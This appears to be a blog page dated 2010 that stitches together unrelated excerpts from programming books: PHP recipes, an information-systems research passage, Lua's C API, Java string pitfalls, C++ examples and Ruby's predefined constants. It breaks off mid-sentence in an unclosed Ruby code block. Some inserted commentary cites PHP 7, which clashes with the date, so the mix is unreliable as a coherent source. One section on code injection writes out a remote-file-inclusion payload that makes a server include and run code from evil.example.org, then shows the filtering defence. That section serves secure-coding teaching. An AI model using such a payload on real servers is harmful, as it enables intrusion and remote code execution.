Monday, January 11, 2010

Recipe 18.6. Keeping Passwords Out of Your Site Files













18.6.1. Problem


You need to use a password to connect to a database, for example. You don't want to put the password in the PHP files you use on your site in case those files are exposed.




18.6.2. Solution


Store the password in an environment variable in a file that the web server loads when starting up. Then, just reference the environment variable in your code:


<?php

mysql_connect('localhost', $_SERVER['DB_USER'], $_SERVER['DB_PASSWORD']);

?>





18.6.3. Discussion


While this technique removes passwords from the source code of your pages, it makes them available in other places that need to be protected. Most importantly, make sure that there are no publicly viewable pages that call phpinfo( ). Because phpinfo( ) displays all of the environment variables, it exposes any passwords you store there. Also, make sure not to expose the contents of $_SERVER in other ways, such as with the print_r( ) function.


Next, especially if you are using a shared host, make sure the environment variables are set in such a way that they are only available to your virtual host, not to all users. With Apache, you can do this by setting the variables in a separate file from the main configuration file:


SetEnv DB_USER     "susannah"
SetEnv DB_PASSWORD "y23a!t@ce8"



Inside the <VirtualHost> directive for the site in the main configuration file (httpd.conf), include this separate file as follows:


Include "/usr/local/apache/database-passwords"



Make sure that this separate file containing the password (e.g., /usr/local/apache/database-passwords) is not readable by any user other than the one that controls the appropriate virtual host. When Apache starts up and is reading in configuration files, it's usually running as root, so it is able to read the included file. A child process that handles requests typically runs as an unprivileged user, so rogue scripts cannot read the protected file.
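As a rough sketch of how a page might read these values defensively, the helper below takes an array such as $_SERVER and fails loudly when either variable is missing, without ever printing a value. The function name db_credentials( ) is hypothetical and not part of the recipe; the sample array stands in for what the SetEnv lines above would provide.

```php
<?php
// Hypothetical helper, not part of the original recipe: fetch the database
// credentials that Apache's SetEnv directives place in $_SERVER.
function db_credentials(array $server)
{
    foreach (array('DB_USER', 'DB_PASSWORD') as $key) {
        if (!isset($server[$key]) || $server[$key] === '') {
            // Name the missing variable, but never print its value.
            throw new RuntimeException("Environment variable $key is not set");
        }
    }
    return array($server['DB_USER'], $server['DB_PASSWORD']);
}

// In a real page you would pass $_SERVER; this sample array is a stand-in.
list($user, $password) = db_credentials(
    array('DB_USER' => 'susannah', 'DB_PASSWORD' => 'y23a!t@ce8')
);
print "Connecting as $user\n";
```

Failing early with the name of the missing variable makes a misconfigured virtual host easier to diagnose than a failed database login would.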




18.6.4. See Also


Documentation on Apache's Include directive at http://httpd.apache.org/docs/mod/core.html#include.













GIM Research Frameworks














No formal definition of global information management could be found in the IS literature. Deans and Ricks (1991) refer to issues at the "interface of MIS and international business" (p. 58). Palvia (1997) refers to "global IT research" and describes a model to "assess the strategic impact of IT on a global organization engaged in international business" (p. 230). For this chapter, we define global information management as the development, use, and management of information systems in a global/international context. By global we mean those information systems that have impacts beyond a single country or country of origin. The term global is used in a general sense since no firm or information system is found in every country in the world. Global information management deals with management, technological, and cultural issues such as differing national communications infrastructures, differing IS quality standards, IS development in different cultures, and many others.

GIM research is the rigorous and systematic study of the development, use, and operations/management of global information systems in a multicountry organizational environment. At the same time, traditional GIM research includes numerous single country studies focusing on the management of the information resource in a domestic context. According to Palvia (1998a), these "first generation" studies have laid the foundation and helped define global IT. This paper has therefore included single country studies in the analysis.


Most of the published literature in GIM that provides some kind of guide to research in the field has concentrated on identifying the "key issues" in the global management of information resources (Badri, 1992; Deans & Ricks, 1991; Ives & Jarvenpaa, 1991; Palvia, 1998b; Watson et al., 1997). These publications survey various stakeholders involved in the research and practice of GIM and are useful in that they attempt to capture what these people think are the critical issues in the field.


Very few papers propose frameworks or models that will help guide comprehensive research in this area. One exception is the work of Deans and Ricks (1991), who identify key issues and develop a research model based on Nolan and Wetherbe's (1981) IS research model and Skinner's (1964) work on international dimensions. This model views research as a set of subsystems that places management information systems (or GIM) at the center of the set. Skinner's international dimensions (social/cultural, economic, technological, political/legal) are overlaid on this framework to show the scope of the issues involved in GIM. This model is useful in a general sense but does not appear to help in showing where previous research fits or in guiding future research.


Another exception is Palvia (1997). In this paper, a model that attempts to measure the strategic impact of IT on the global firm is proposed. This model is useful in that it identifies a number of strategic factors that should be considered in studying global IT. However, this model does not identify key areas for future research in GIM and was not developed specifically to guide comprehensive research in the field.


Other preliminary frameworks with a focus on culture might also be considered GIM research frameworks. Ein-Dor, Segev, and Orgad (1993), in their model, contend that culture as a variable consists of three major dimensions—economic, demographic, and psycho-sociological. The authors argue that any research into global IT should consider these cultural dimensions. Nelson and Clark (1994) propose a model describing the effect of multicultural environments on IT development and use. However, both of these models are too narrow in their scope and do not provide a broad framework to guide research in GIM.


What appears to be missing at this point is an overall research model, similar to the early IS research models, which will help guide future research into GIM and help organize and categorize research previously done. According to Palvia (1998a), such a framework has yet to be developed.











Recipe 7.17. Defining Static Properties and Methods













7.17.1. Problem


You want to define methods in a class and be able to call them without instantiating an object.




7.17.2. Solution


Declare the method as static:


class Format {
    public static function number($number, $decimals = 2,
                                  $decimal = '.', $thousands = ',') {
        return number_format($number, $decimals, $decimal, $thousands);
    }
}

print Format::number(1234.567);
1,234.57





7.17.3. Discussion


Occasionally, you want to define a collection of methods in a class, but you want to be able to invoke those methods without instantiating an object. In PHP 5, declaring a method static lets you call it directly:


class Format {
    public static function number($number, $decimals = 2,
                                  $decimal = '.', $thousands = ',') {
        return number_format($number, $decimals, $decimal, $thousands);
    }
}

print Format::number(1234.567);
1,234.57



Since static methods don't require an object instance, use the class name instead of the object. Don't place a dollar sign ($) before the class name.


Static methods aren't referenced with an arrow (->), but with double colons (::); this signals to PHP that the method is static. So in the example, the number( ) method of the Format class is accessed using Format::number( ).


Number formatting doesn't depend on any other object properties or methods. Therefore, it makes sense to declare this method static. This way, for example, inside your shopping cart application, you can format the price of items in a pretty manner with just one line of code and still use an object instead of a global function.


Static methods do not operate on a specific instance of the class where they're defined. PHP does not "construct" a temporary object for you to use while you're inside the method. Therefore, you cannot refer to $this inside a static method, because there's no $this on which to operate. Calling a static method is just like calling a regular function.


PHP 5 also has a feature known as static properties. Every instance of a class shares these properties in common. Thus, static properties act as class-namespaced global variables.


One reason for using a static property is to share a database connection among multiple Database objects. For efficiency, you shouldn't create a new connection to your database every time you instantiate Database. Instead, negotiate a connection the first time and reuse that connection in each additional instance, as shown in Example 7-37.


Example 7-37. Sharing a static property across instances



class Database {
    private static $dbh = NULL;

    public function __construct($server, $username, $password) {
        if (self::$dbh == NULL) {
            self::$dbh = db_connect($server, $username, $password);
        } else {
            // reuse existing connection
        }
    }
}

$db = new Database('db.example.com', 'web', 'jsd6w@2d');
// Do a bunch of queries

$db2 = new Database('db.example.com', 'web', 'jsd6w@2d');
// Do some additional queries




Static properties, like static methods, use the double colon notation. To refer to a static property inside of a class, use the special prefix of self. self is to static properties and methods as $this is to instantiated properties and methods.


The constructor uses self::$dbh to access the static connection property. When $db is instantiated, self::$dbh is still set to NULL, so the constructor calls db_connect( ) to negotiate a new connection with the database.


This does not occur when you create $db2, since self::$dbh has already been set to the database handle.
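To see the sharing in action without a real database, here is a minimal sketch in which db_connect( ) is replaced by a stand-in that only counts its calls. Both the stand-in and the handle( ) accessor are assumptions added for illustration; they are not part of the recipe.

```php
<?php
// Stand-in for a real connection function (an assumption for this sketch):
// it only counts how many times it has been called.
function db_connect($server, $username, $password)
{
    static $calls = 0;
    $calls++;
    return "connection #$calls to $server";
}

class Database
{
    private static $dbh = null;

    public function __construct($server, $username, $password)
    {
        // Connect only if no instance has connected yet.
        if (self::$dbh === null) {
            self::$dbh = db_connect($server, $username, $password);
        }
    }

    // Hypothetical accessor so the shared handle can be inspected.
    public function handle()
    {
        return self::$dbh;
    }
}

$db  = new Database('db.example.com', 'web', 'jsd6w@2d');
$db2 = new Database('db.example.com', 'web', 'jsd6w@2d');

// Both objects report the same handle, so db_connect() ran only once.
var_dump($db->handle() === $db2->handle());
print $db2->handle() . "\n";
```

Because the property belongs to the class rather than to either object, the second constructor call finds it already populated and skips the connection step.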




7.17.4. See Also


Documentation on the static keyword at http://www.php.net/manual/en/language.oop5.static.php.


























Programming in Lua
Part IV. The C API
            
Chapter 24. An Overview of the C API



24.2 - The Stack





We face two problems when trying to exchange values between Lua and C:
the mismatch between a dynamic and a static type system
and the mismatch between
automatic and manual memory management.

In Lua, when we write a[k] = v,
both k and v can have several different types
(even a may have different types,
due to metatables).
If we want to offer this operation in C, however,
any settable function must have a fixed type.
We would need dozens of different functions for this single operation
(one function for each combination of types for the three arguments).

We could solve this problem by declaring some kind of union type in C,
let us call it lua_Value,
that could represent all Lua values.
Then, we could declare settable as


void lua_settable (lua_Value a, lua_Value k, lua_Value v);

This solution has two drawbacks.
First, it can be difficult to map
such a complex type to other languages;
Lua has been designed to
interface easily not only with C/C++,
but also with Java, Fortran, and the like.
Second, Lua does garbage collection:
If we keep a Lua value in a C variable,
the Lua engine has no way to know about this use;
it may (wrongly) assume that this value is garbage
and collect it.

Therefore, the Lua API does not define
anything like a lua_Value type.
Instead, it uses an abstract stack to exchange values between Lua and C.
Each slot in this stack can hold any Lua value.
Whenever you want to ask for a value from Lua
(such as the value of a global variable),
you call Lua, which pushes the required value on the stack.
Whenever you want to pass a value to Lua,
you first push the value on the stack,
and then you call Lua (which will pop the value).
We still need a different function to push each C type on the stack
and a different function to get each value from the stack,
but we avoid the combinatorial explosion.
Moreover, because this stack is managed by Lua,
the garbage collector knows which values C is using.

Nearly all functions in the API use the stack.
As we saw in our first example,
luaL_loadbuffer leaves its result on the stack
(either the compiled chunk or an error message);
lua_pcall gets the function to be called from the stack
and leaves any occasional error message there.

Lua manipulates this stack in a strict LIFO discipline
(Last In, First Out; that is, always through the top).
When you call Lua, it only changes the top part of the stack.
Your C code has more freedom;
specifically, it can inspect any element inside the stack
and even insert and delete elements in any arbitrary position.























5.4. Code Injection








An extremely dangerous situation exists when you use tainted data as the leading part of a dynamic include:



<?php

include "{$_GET['path']}/header.inc";

?>



Rather than being able to manipulate only the filename, this situation allows an attacker to manipulate the nature of the resource to be included. Due to a feature of PHP that is enabled by default (and controlled by the allow_url_fopen directive), resources other than files can be included:



<?php

include 'http://www.google.com/';

?>



The behavior of this use of include is that the source of http://www.google.com is included as though it were a local file. While this particular example is harmless, imagine if the source returned by Google contained PHP code. The PHP code would be interpreted and executed, which is exactly the opportunity that an attacker can take advantage of to deliver a serious blow to your security.


Imagine a value of path that indicates a resource under the attacker's control:



http://example.org/index.php?path=http%3A%2F%2Fevil.example.org%2Fevil.inc%3F



In this example, path is the URL-encoded value of the following:



http://evil.example.org/evil.inc?



This causes the include statement to include and execute code of the attacker's choosing (evil.inc), and the filename is treated as the query string:



<?php

include "http://evil.example.org/evil.inc?/header.inc";

?>



This eliminates the need for an attacker to guess the remaining pathname and filename (/header.inc) and reproduce this at evil.example.org. Instead, all she must do is make the evil.inc script output valid PHP code to be executed by the victim's web server; it can ignore the query string.


This is just as dangerous as allowing an attacker to edit your PHP scripts directly. Luckily, it is easily defeated: use only filtered data in your include and require statements:



<?php

$clean = array();

/* $_GET['path'] is filtered and stored in $clean['path']. */

include "{$clean['path']}/header.inc";

?>
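The filtering step itself is left as a comment above. One common way to implement it is a whitelist, sketched below under stated assumptions: the function name filter_path( ), the accepted keys, and the template directories are all hypothetical. The request value selects one of a few developer-chosen directories and is never used as a path itself.

```php
<?php
// Hypothetical whitelist: the keys are the only values accepted from the
// request, and the directories are chosen by the developer, not the user.
function filter_path($input)
{
    $allowed = array(
        'default' => 'templates/default',
        'print'   => 'templates/print',
    );
    if (is_string($input) && isset($allowed[$input])) {
        return $allowed[$input];
    }
    return false;
}

$clean = array();

// A request parameter as it might arrive in $_GET['path'].
$tainted = 'http://evil.example.org/evil.inc?';

$path = filter_path($tainted);
if ($path !== false) {
    $clean['path'] = $path;
}

if (isset($clean['path'])) {
    // Only at this point would the include be performed:
    // include "{$clean['path']}/header.inc";
    print "would include {$clean['path']}/header.inc\n";
} else {
    print "rejected\n";
}
```

Since the attacker's string never reaches the include statement, neither a remote URL nor a directory traversal sequence can change which file is loaded.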













10. Strings





















This section concerns character strings.





10.1. Arrays do not override Object.toString



Prescription: For char arrays, use String.valueOf to obtain the string representing the designated sequence of characters. For other types of arrays, use Arrays.toString or, prior to release 5.0, Arrays.asList.



References: Puzzle 12; [JLS 10.7].







10.2. String.replaceAll takes a regular expression as its first argument



Prescription: Ensure that the argument is a legal regular expression, or use String.replace instead.



References: Puzzle 20.







10.3. String.replaceAll takes a replacement string as its second argument



Prescription: Ensure that the argument is a legal replacement string, or use String.replace instead.



References: Puzzle 20.







10.4. Repeated string concatenation can cause poor performance



Prescription: Avoid using the string concatenation operator in loops.



References: [EJ item 33].







10.5. Conversion of bytes to characters requires a charset



Prescription: Always select a charset when converting a byte array to a string or char array; if you don't, the platform default charset will be used, leading to unpredictable behavior.



References: Puzzle 18.







10.6. Values of type char are silently converted to int, not String



Prescription: To convert a char to a string, use String.valueOf(char).



References: Puzzles 11 and 23; [JLS 5.1.2].




















    The underflow_error Class






    Class Name: underflow_error
    Header File: <stdexcept>
    Classification: Exception
    Member Classes: None
    Methods: underflow_error(const string &What_Arg)





    Class Description



    The underflow_error class is derived from the runtime_error class.
    The underflow_error class represents exceptions that occur because of
    arithmetic underflow errors.






    Method: underflow_error()
    Access: Public
    Classification: Constructor
    Syntax: underflow_error(const string &What_Arg)
    Parameters: The What_Arg parameter should contain a description of the kind of exception that has occurred.
    Return: None



    Description



    The underflow_error() method constructs an object of type underflow_error. The What_Arg parameter
    can be used to set a description of the kind of error that this exception represents.
    A set of possible solutions is sometimes supplied with the exception description in addition
    to the type of error.





    The Class Relationship Diagram of underflow_error









    #include <exception>
    #include <iostream>
    #include <stdexcept>

    using namespace std;

    int main()
    {
        // Throw and catch a plain exception object.
        try {
            exception X;
            throw X;
        }
        catch (const exception &X) {
            cout << X.what() << endl;
        }

        // Throw an underflow_error and catch it through its base class.
        try {
            underflow_error UnderFlow("Arithmetic Operation Underflow");
            throw UnderFlow;
        }
        catch (const exception &X) {
            cout << X.what() << endl;
        }

        return 0;
    }



    We Want to Hear from You!




    As the reader of this book, you are our most important critic and commentator. We value your opinion and want to know what we're doing right, what we could do better, what areas you'd like to see us publish in, and any other words of wisdom you're willing to pass our way.

    As an associate publisher for Sams Publishing, I welcome your comments. You can email or write me directly to let me know what you did or didn't like about this book, as well as what we can do to make our books better.

    Please note that I cannot help you with technical problems related to the topic of this book. We do have a User Services group, however, where I will forward specific technical questions related to the book.

    When you write, please be sure to include this book's title and author as well as your name, email address, and phone number. I will carefully review your comments and share them with the author and editors who worked on the book.

    Email:

    feedback@samspublishing.com

    Mail:

    Michael Stephens
    Associate Publisher
    Sams Publishing
    800 East 96th Street
    Indianapolis, IN 46240 USA

    For more information about this book or another Sams Publishing title, visit our Web site at www.samspublishing.com. Type the ISBN (excluding hyphens) or the title of a book in the Search field to find the page you're looking for.








      Program 86: Lack of Self-Awareness














      The following program is designed to test out our simple array. Yet there's a problem that causes the program to fail in an unexpected way.




      1 /************************************************
      2 * array_test -- Test the use of the array class*
      3 ************************************************/
      4 #include <iostream>
      5
      6 /************************************************
      7 * array -- Classic variable length array class.*
      8 * *
      9 * Member functions: *
      10 * operator [] -- Return an item *
      11 * in the array. *
      12 ************************************************/
      13 class array {
      14 protected:
      15 // Size of the array
      16 int size;
      17
      18 // The array data itself
      19 int *data;
      20 public:
      21 // Constructor.
      22 // Set the size of the array
      23 // and create data
      24 array(const int i_size):
      25 size(i_size),
      26 data(new int[size])
      27 {
      28 // Clear the data
      29 memset(data, '\0',
      30 size * sizeof(data[0]));
      31 }
      32 // Destructor -- Return data to the heap
      33 virtual ~array(void)
      34 {
      35 delete []data;
      36 data = NULL;
      37 }
      38 // Copy constructor.
      39 // Delete the old data and copy
      40 array(const array &old_array)
      41 {
      42 delete []data;
      43 data = new int[old_array.size];
      44
      45 memcpy(data, old_array.data,
      46 size * sizeof(data[0]));
      47 }
      48 // operator =.
      49 // Delete the old data and copy
      50 array & operator = (
      51 const array &old_array)
      52 {
      53 delete []data;
      54 data = new int[old_array.size];
      55
      56 memcpy(data, old_array.data,
      57 size * sizeof(data[0]));
      58 return (*this);
      59 }
      60 public:
      61 // Get a reference to an item in the array
      62 int &operator [](const unsigned int item)
      63 {
      64 return data[item];
      65 }
      66 };
      67
      68 /**********************************************
      69 * three_more_elements -- *
      70 * Copy from_array to to_array and *
      71 * put on three more elements. *
      72 **********************************************/
      73 void three_more_elements(
      74 // Original array
      75 array to_array,
      76
      77 // New array with modifications
      78 const array &from_array
      79 )
      80 {
      81 to_array = from_array;
      82 to_array[10] = 1;
      83 to_array[11] = 3;
      84 to_array[11] = 5;
      85 }
      86 int main()
      87 {
      88 array an_array(30); // Simple test array
      89
      90 an_array[2] = 2; // Put in an element
      91 // Put on a few more
      92 three_more_elements(an_array, an_array);
      93 return(0);
      94 }


      (Next Hint 8. Answer 75.)




















      Recipe 10.3. Connecting to an SQL Database













      10.3.1. Problem


      You want access to an SQL database to store or retrieve information. Without a database, dynamic web sites aren't very dynamic.




      10.3.2. Solution


      Create a new PDO object with the appropriate connection string. Example 10-8 shows PDO object creation for a few different kinds of databases.


      Example 10-8. Connecting with PDO



      <?php
      // MySQL expects parameters in the string
      $mysql = new PDO('mysql:host=db.example.com', $user, $password);
      // Separate multiple parameters with ;
      $mysql = new PDO('mysql:host=db.example.com;port=31075', $user, $password);
      $mysql = new PDO('mysql:host=db.example.com;port=31075;dbname=food', $user, $password);
      // Connect to a local MySQL Server
      $mysql = new PDO('mysql:unix_socket=/tmp/mysql.sock', $user, $password);

      // PostgreSQL also expects parameters in the string
      $pgsql = new PDO('pgsql:host=db.example.com', $user, $password);
      // But you separate multiple parameters with ' '
      $pgsql = new PDO('pgsql:host=db.example.com port=31075', $user, $password);
      $pgsql = new PDO('pgsql:host=db.example.com port=31075 dbname=food', $user, $password);
      // You can put the user and password in the DSN if you like.
      $pgsql = new PDO("pgsql:host=db.example.com port=31075 dbname=food user=$user password=$password");

      // Oracle
      // If a database name is defined in tnsnames.ora, just put that in the DSN
      $oci = new PDO('oci:food', $user, $password);
      // Otherwise, specify an Instant Client URI
      $oci = new PDO('oci:dbname=//db.example.com:1521/food', $user, $password);

      // Sybase (If PDO is using FreeTDS)
      $sybase = new PDO('sybase:host=db.example.com;dbname=food', $user, $password);
      // Microsoft SQL Server (If PDO is using MS SQL Server libraries)
      $mssql = new PDO('mssql:host=db.example.com;dbname=food', $user, $password);
      // DBLib (for other versions of DB-lib)
      $dblib = new PDO('dblib:host=db.example.com;dbname=food', $user, $password);

      // ODBC -- a predefined connection
      $odbc = new PDO('odbc:DSN=food');
      // ODBC -- an ad-hoc connection. Provide whatever the underlying driver needs
      $odbc = new PDO('odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:\\data\\food.mdb;Uid=Chef');

      // SQLite just expects a filename -- no user or password
      $sqlite = new PDO('sqlite:/usr/local/zodiac.db');
      $sqlite = new PDO('sqlite:c:/data/zodiac.db');
      // SQLite can also handle in-memory, temporary databases
      $sqlite = new PDO('sqlite::memory:');
      // SQLite v2 DSNs look similar to v3
      $sqlite2 = new PDO('sqlite2:/usr/local/old-zodiac.db');
      ?>






      10.3.3. Discussion


      If all goes well, the PDO constructor returns a new object that can be used for querying the database. If there's a problem, a PDOException is thrown.


      As you can see from Example 10-8, the format of the DSN is highly dependent on which kind of database you're attempting to connect to. In general, though, the first argument to the PDO constructor is a string that describes the location and name of the database you want and the second and third arguments are the username and password to connect to the database with. Note that to use a particular PDO backend, PHP must be built with support for that backend. Use the output from phpinfo( ) to determine what PDO backends your PHP setup has.
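A minimal sketch of handling the PDOException mentioned above, assuming only that the PDO extension itself is loaded. The wrapper name try_connect( ) and the invalid driver name nosuchdriver are made up for illustration. PDO::getAvailableDrivers( ) is used here as a programmatic alternative to reading the phpinfo( ) output.

```php
<?php
// Hypothetical wrapper: returns a PDO object, or null if the connection fails.
function try_connect($dsn, $user = null, $password = null)
{
    try {
        return new PDO($dsn, $user, $password);
    } catch (PDOException $e) {
        // Report the reason without echoing the DSN or the credentials.
        print "Connection failed: " . $e->getMessage() . "\n";
        return null;
    }
}

// List the backends this PHP build supports.
print "Available drivers: " . implode(', ', PDO::getAvailableDrivers()) . "\n";

// 'nosuchdriver' is a deliberately invalid driver name, so this call fails.
$db = try_connect('nosuchdriver:host=db.example.com', 'user', 'secret');
var_dump($db === null);
```

Catching the exception at the point of connection keeps an uncaught error, which may include connection details in its trace, from reaching the browser.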




      10.3.4. See Also


      Recipe 10.4 for querying an SQL database; Recipe 10.6 for modifying an SQL database; documentation on PDO at http://www.php.net/PDO.













      Recipe 1.12. Generating Fixed-Width Field Data Records













      1.12.1. Problem


      You need to format data records such that each field takes up a set number of characters.




      1.12.2. Solution


      Use pack( )
      with a format string that specifies a sequence of
      space-padded strings. Example 1-32 transforms an
      array of data into fixed-width records.


      Example 1-32. Generating fixed-width field data records



      <?php

      $books = array( array('Elmer Gantry', 'Sinclair Lewis', 1927),
                      array('The Scarlatti Inheritance','Robert Ludlum',1971),
                      array('The Parsifal Mosaic','William Styron',1979) );

      foreach ($books as $book) {
          print pack('A25A15A4', $book[0], $book[1], $book[2]) . "\n";
      }

      ?>






      1.12.3. Discussion


      The format string A25A15A4 tells pack( ) to transform its subsequent arguments into a 25-character space-padded string, a 15-character space-padded string, and a 4-character space-padded string. For space-padded fields in fixed-width records, pack( ) provides a concise solution.
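To make the padding behavior concrete, the short sketch below applies a single A5 field to a value that is too short and to one that is too long, then checks the width of a full record. The sample strings are arbitrary and chosen only for illustration.

```php
<?php
// 'A5' always yields exactly five characters.
$short = pack('A5', 'abc');        // padded on the right with spaces
$long  = pack('A5', 'abcdefgh');   // cut down to the first five characters

var_dump($short === 'abc  ');
var_dump($long === 'abcde');

// A full record built with the recipe's format is 25 + 15 + 4 characters wide.
$record = pack('A25A15A4', 'Elmer Gantry', 'Sinclair Lewis', 1927);
print strlen($record) . "\n";
```

Note that values longer than the field width are cut off without warning, so it is worth checking field lengths first if losing data matters.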


      To pad fields with something other than a space, however, use substr( ) to ensure that the field values aren't too long and str_pad( ) to ensure that the field values aren't too short. Example 1-33 transforms an array of records into fixed-width records with .-padded fields.


      Example 1-33. Generating fixed-width field data records without pack( )



      <?php

      $books = array( array('Elmer Gantry', 'Sinclair Lewis', 1927),
                      array('The Scarlatti Inheritance','Robert Ludlum',1971),
                      array('The Parsifal Mosaic','William Styron',1979) );

      foreach ($books as $book) {
          $title  = str_pad(substr($book[0], 0, 25), 25, '.');
          $author = str_pad(substr($book[1], 0, 15), 15, '.');
          $year   = str_pad(substr($book[2], 0, 4), 4, '.');
          print "$title$author$year\n";
      }

      ?>






      1.12.4. See Also


      Documentation on pack( ) at http://www.php.net/pack and on str_pad( ) at http://www.php.net/str_pad. Recipe 1.16 discusses pack( ) format strings in more detail.













      Recipe 21.5. Avoiding Regular Expressions













      21.5.1. Problem


      You want to improve script performance by optimizing string-matching operations.




      21.5.2. Solution


      Replace unnecessary regular expression calls with faster string and character type function alternatives.




      21.5.3. Discussion


      A common source of unnecessary computation is the use of regular expression functions when they are not needed, for example, if you're validating a form submission for a valid username and want to make sure that the username contains only alphanumeric characters.


      A common approach to this problem is a regular expression:


      <?php
      if (!preg_match('/^[a-z0-9]*$/i', $username)) {
          echo 'please enter a valid username.';
      }
      ?>



      The same test can be performed much faster with the ctype_alnum( ) function.


      Using code-timing techniques covered in Recipe 21.1, let's compare the above test with ctype_alnum( ):


      <?php
      $username = 'foo411';

      $start = microtime(true);

      // Same pattern as above, including the closing $ anchor
      if (!preg_match('/^[a-z0-9]*$/i', $username)) {
          echo 'please enter a valid username';
      }

      $regextime = microtime(true) - $start;

      $start = microtime(true);

      if (!ctype_alnum($username)) {
          echo 'please enter a valid username';
      }

      $ctypetime = microtime(true) - $start;

      echo "preg_match took: $regextime seconds\n";
      echo "ctype_alnum took: $ctypetime seconds\n";
      ?>



      This will output results similar to:


      preg_match took:  0.000163078308105 seconds
      ctype_alnum took: 9.05990600586E-06 seconds



      ctype_alnum( ) is considerably faster; 9.05990600586E-06 is the same as 0.00000906 seconds, which is 18 times faster than the preg_match( ) regular expression, with exactly the same result.


      When applied to a complex application, replacing unnecessary regular expressions with equivalent alternatives can add up to a significant performance gain.
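A single timed call is easily distorted by noise, so a loop gives a steadier comparison. The sketch below repeats each test many times; the iteration count is arbitrary, and the pattern uses + rather than * so that, like ctype_alnum( ), it rejects an empty string. Actual timings depend on the machine and PHP version, so none are shown.

```php
<?php
$username = 'foo411';
$n = 100000;   // arbitrary iteration count for this sketch

// Time the regular expression test.
$start = microtime(true);
for ($i = 0; $i < $n; $i++) {
    $regexok = (preg_match('/^[a-z0-9]+$/i', $username) === 1);
}
$regextime = microtime(true) - $start;

// Time the ctype test.
$start = microtime(true);
for ($i = 0; $i < $n; $i++) {
    $ctypeok = ctype_alnum($username);
}
$ctypetime = microtime(true) - $start;

printf("preg_match:  %.6f seconds for %d calls\n", $regextime, $n);
printf("ctype_alnum: %.6f seconds for %d calls\n", $ctypetime, $n);
```

Both tests agree for this sample username, but they are not identical in every case. For example, a $ anchor also matches just before a trailing newline, so confirm the two behave the same on your own inputs before swapping one for the other.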


      A good litmus test when you're coding and need to decide whether or not you need to use a regular expression is whether or not the match you're performing can be explained in a brief sentence. Granted, there are some matches, such as "string is a valid email address," which cannot be adequately verified without a complex regular expression. However, "check if string A contains string B" can be tested with several different approaches, but is ultimately a very simple test that does not require regular expressions:


      $haystack = 'The quick brown fox jumps over the lazy dog';
      $needle = 'lazy dog';

      // slowest (ereg( ) is deprecated as of PHP 5.3 and removed in PHP 7)
      if (ereg($needle, $haystack)) echo 'match!';

      // slow
      if (preg_match("/$needle/", $haystack)) echo 'match!';

      // fast
      if (strstr($haystack, $needle)) echo 'match!';

      // fastest
      if (strpos($haystack, $needle) !== false) echo 'match!';



      There is certainly a benefit to double-checking the ctype and string functions before making a commitment to a regular expression, particularly if you're working on a section of code that will loop repeatedly.
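One detail of the strpos( ) test deserves a short illustration: the strict !== false comparison matters because strpos( ) returns 0 when the needle sits at the very start of the haystack. The haystack below is rearranged from the one above to trigger that case.

```php
<?php
$haystack = 'lazy dog, meet the quick brown fox';
$needle = 'lazy dog';

// strpos() returns 0 here because the match is at the very start.
$pos = strpos($haystack, $needle);

// Loose test: 0 is treated as false, so the match is missed.
$loose = $pos ? 'match' : 'no match';

// Strict test: only a real false means "not found".
$strict = ($pos !== false) ? 'match' : 'no match';

print "loose: $loose, strict: $strict\n";
```

The same caution applies to any function that can return either a valid zero or false.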




      21.5.4. See Also


      Documentation on ctype functions at http://www.php.net/manual/en/ref.ctype.php; on string functions at http://www.php.net/manual/en/ref.strings.php; on regular expression functions at http://www.php.net/manual/en/ref.pcre.php.





















      10.2. The Top-Level Environment


      When the Ruby interpreter starts, a number of classes, modules,
      constants, and global variables and global functions are defined and
      available for use by programs. The subsections that follow list these
      predefined features.



      10.2.1. Predefined Modules and Classes


      When the Ruby 1.8 interpreter starts, the following modules are
      defined:


      Comparable      FileTest        Marshal         Precision
      Enumerable      GC              Math            Process
      Errno           Kernel          ObjectSpace     Signal



      These classes are defined on startup:


      Array           File            Method          String
      Bignum          Fixnum          Module          Struct
      Binding         Float           NilClass        Symbol
      Class           Hash            Numeric         Thread
      Continuation    IO              Object          ThreadGroup
      Data            Integer         Proc            Time
      Dir             MatchData       Range           TrueClass
      FalseClass      MatchingData    Regexp          UnboundMethod



      The following exception classes are also defined:


      ArgumentError           NameError               SignalException
      EOFError                NoMemoryError           StandardError
      Exception               NoMethodError           SyntaxError
      FloatDomainError        NotImplementedError     SystemCallError
      IOError                 RangeError              SystemExit
      IndexError              RegexpError             SystemStackError
      Interrupt               RuntimeError            ThreadError
      LoadError               ScriptError             TypeError
      LocalJumpError          SecurityError           ZeroDivisionError



      Ruby 1.9 adds the following modules, classes, and
      exceptions:


      BasicObject     FiberError      Mutex           VM
      Fiber           KeyError        StopIteration



      You can check the predefined modules, classes, and exceptions in
      your implementation with code like this:


      # Print all modules (excluding classes)
      puts Module.constants.sort.select {|x| eval(x.to_s).instance_of? Module}

      # Print all classes (excluding exceptions)
      puts Module.constants.sort.select {|x|
        c = eval(x.to_s)
        c.is_a? Class and not c.ancestors.include? Exception
      }

      # Print all exceptions
      puts Module.constants.sort.select {|x|
        c = eval(x.to_s)
        c.instance_of? Class and c.ancestors.include? Exception
      }





      10.2.2. Top-Level Constants


      When the Ruby interpreter starts, the following top-level
      constants are defined (in addition
      to the modules and classes listed previously). A module that defines a
      constant by the same name can still access these top-level constants by
      explicitly prefixing them with ::. You can list the
      top-level constants in your implementation with:


      ruby -e 'puts Module.constants.sort.reject{|x| eval(x.to_s).is_a? Module}'
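The :: prefix mentioned above can be illustrated with a minimal sketch. The module name Shadowing and its methods are hypothetical, introduced only for this example; the module defines its own RUBY_VERSION so that the unqualified name no longer reaches the top-level constant:

```ruby
# Shadowing is a hypothetical module used only for illustration.
module Shadowing
  # A module-level constant with the same name as a top-level constant.
  RUBY_VERSION = "shadowed"

  # An unqualified lookup finds the module's own constant first.
  def self.local_value
    RUBY_VERSION
  end

  # The :: prefix forces the lookup to start at the top level.
  def self.top_level_value
    ::RUBY_VERSION
  end
end
```

Here Shadowing.local_value returns "shadowed", while Shadowing.top_level_value returns the interpreter's real version string.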






      ARGF



      An IO object providing access to a
      virtual concatenation of files named in ARGV,
      or to standard input if ARGV is empty. A
      synonym for $<.






      ARGV



      An array containing the arguments specified on the command line. A
      synonym for $*.






      DATA



      If your program file includes the token
      __END__ on a line by itself, then this constant
      is defined to be a stream that allows access to the lines of the
      file following __END__. If the program file
      does not include __END__, then this constant is
      not defined.






      ENV



      An object that behaves like a hash and provides access
      to the environment variable settings in effect for the
      interpreter.
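As a rough sketch of what "behaves like a hash" means in practice, the following method exercises a few hash-style operations on ENV. The method name env_demo and the variable names DEMO_GREETING and DEMO_MISSING are assumptions made up for this example:

```ruby
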